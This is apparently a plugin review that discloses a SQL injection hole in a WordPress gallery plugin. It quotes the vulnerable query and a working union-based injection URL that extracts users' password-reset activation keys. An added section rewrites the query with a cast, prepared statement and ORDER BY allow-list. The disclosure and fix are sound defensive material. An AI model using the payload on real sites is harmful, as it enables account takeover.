Rating: 1 star
This plugin was responsible for my blogs getting hacked as they use highly vulnerable code in this plugin.
There is no protection against SQL injection in the plugin functions. Request parameters are added happily to some SQL query without escaping them; in the following example $galleryID is simply a copy of $_REQUEST["galleryID"]:
$pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");
I recommend not using this plugin at all. It was obviously developed by some programming beginner and should not be used on a production site.
Example: Set your own activation key for a user to reset the password to your own:
nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,
(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'
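Added example (not the reviewer's code and not the plugin's own): the query quoted in the review rewritten so the request value cannot change the SQL. The gallery id is cast to an integer and bound with $wpdb->prepare(), and the ORDER BY column and direction, which cannot be bound as placeholders, are checked against a fixed allow-list. The function name, the allow-listed column names and the fallback defaults are assumptions; $wpdb->prepare() and the $wpdb->nggallery / $wpdb->nggpictures table properties are as used on this page.

```php
<?php
// Added example, not the plugin's code: a hardened version of the query quoted
// in the review. Assumes it runs inside WordPress, where the global $wpdb exists.

/**
 * Fetch the non-excluded pictures of one gallery.
 *
 * @param mixed  $gallery_id  Raw request value; cast to int before use.
 * @param string $sort_col    Requested sort column (from plugin options).
 * @param string $sort_dir    Requested sort direction (from plugin options).
 * @return array|null         Rows from $wpdb->get_results().
 */
function example_get_gallery_pictures( $gallery_id, $sort_col, $sort_dir ) {
    global $wpdb;

    // 1. The gallery id is numeric by definition: force the type instead of
    //    interpolating the request string into the SQL. A payload such as
    //    "999999.9' union ..." collapses to the integer 999999 here.
    $gallery_id = (int) $gallery_id;

    // 2. Identifiers (ORDER BY column and direction) cannot be bound as
    //    placeholders, so map them against a fixed allow-list and fall back to
    //    a safe default. The column names below are assumed, not the plugin's.
    $allowed_cols = array( 'pid', 'sortorder', 'imagedate', 'filename' );
    $sort_col     = in_array( $sort_col, $allowed_cols, true ) ? $sort_col : 'sortorder';
    $sort_dir     = ( strtoupper( (string) $sort_dir ) === 'DESC' ) ? 'DESC' : 'ASC';

    // 3. The only user-controlled value goes through $wpdb->prepare(); %d binds
    //    an integer, so quoting tricks cannot alter the statement structure.
    $sql = $wpdb->prepare(
        "SELECT t.*, tt.*
           FROM {$wpdb->nggallery} AS t
           INNER JOIN {$wpdb->nggpictures} AS tt ON t.gid = tt.galleryid
          WHERE t.gid = %d AND tt.exclude != 1
          ORDER BY tt.{$sort_col} {$sort_dir}",
        $gallery_id
    );

    return $wpdb->get_results( $sql );
}

// Usage: the same inputs the vulnerable snippet read, now passed through the
// hardened function. $ngg_options is the plugin's options array as on the page.
$pictures = example_get_gallery_pictures(
    isset( $_REQUEST['galleryID'] ) ? $_REQUEST['galleryID'] : 0,
    isset( $ngg_options['galSort'] ) ? $ngg_options['galSort'] : 'sortorder',
    isset( $ngg_options['galSortDir'] ) ? $ngg_options['galSortDir'] : 'ASC'
);
```

The two fixes cover the two different kinds of interpolation in the original query: a value (the gallery id), which a prepared placeholder handles, and identifiers (the sort column and direction), which only an allow-list can make safe. Casting alone would have stopped the injection shown in the review, but the allow-list is what keeps the option-driven ORDER BY from becoming the next injection point.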